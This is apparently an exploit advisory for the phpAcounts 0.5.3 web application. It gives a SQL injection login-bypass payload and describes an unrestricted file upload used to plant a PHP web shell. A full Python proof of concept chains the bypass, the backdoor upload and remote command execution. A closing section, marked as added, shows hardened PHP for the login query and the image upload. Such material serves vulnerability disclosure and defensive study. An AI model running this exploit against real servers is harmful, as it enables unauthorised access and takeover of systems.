
phpAcounts v.0.5.3 SQL Injection and Fix

Title: phpAcounts v.0.5.3 SQL Injection
Author: loneferret
Affected version: 0.5.3
Developer site: http://phpaccounts.com/
Tested on: Ubuntu Server 11.10

# Old app, still fun.

Auth. Bypass:
http://server/phpaccounts/index.php
Username: x' or '1'='1'#
Password: <whatever>

Upload php shell in preferences
Letterhead image upload does not sanitize file extensions.
http://server/index.php?page=tasks&action=preferences

Access shell:
Where '1' is the user's ID.
http://server/phpaccounts/users/1/<filename>

---- Python PoC ---------

#!/usr/bin/python

import re, mechanize
import urllib, sys

print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

print "[*] Bypassing Login ."
try:
    br = mechanize.Browser()
    br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
    assert br.viewing_html()
    br.select_form(name="loginForm")
    br.select_form(nr=0)
    br.form['Login_Username'] = "x' or '1'#"
    br.form['Login_Password'] = "pwnd"
    print "[*] Triggering SQLi .."
    br.submit()
except:
    print "[*] Oups..Something happened"
    exit(0)

print "[*] Uploading Shell ..."
try:
    br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
    assert br.viewing_html()
    br.select_form(nr=0)
    br.form["Preferences[LETTER_HEADER]"] = 'test'
    br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
    br.submit(nr=2)
except:
    print "[*] Upload didn't work"
    exit(0)

print "[*] Command Executed\n"
try:
    shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
    print shell.read()
except:
    print "[*] Oups."
    exit(0)
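
One way to close the two flaws described above, as an added example that is not phpAcounts code and not part of the original advisory. The `users` table, its columns and both function names are hypothetical.

```php
<?php
// Added example: hypothetical hardened replacements for the two flaws above.
// Table, column and function names are assumptions, not phpAcounts source.

// 1. Login: bind the username as a parameter so input such as
//    x' or '1'='1'# is compared as a literal string, never parsed as SQL.
function check_login(PDO $db, string $username, string $password): ?int
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // password_verify() assumes hashes were created with password_hash().
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// 2. Letterhead upload: accept only real images, and choose the stored
//    name and extension on the server instead of trusting the client's.
function store_letterhead(array $file, string $userDir): ?string
{
    $allowed = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $info = @getimagesize($file['tmp_name']);   // false when not an image
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;
    }
    // Server-generated name: a client name like "x.php" never reaches disk.
    $name = 'letterhead_' . bin2hex(random_bytes(8)) . '.' . $allowed[$info[2]];
    if (!move_uploaded_file($file['tmp_name'], rtrim($userDir, '/') . '/' . $name)) {
        return null;
    }
    return $name;
}
```

Because `getimagesize()` only inspects the file header, the upload directory should also be configured so the web server never executes PHP from it.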
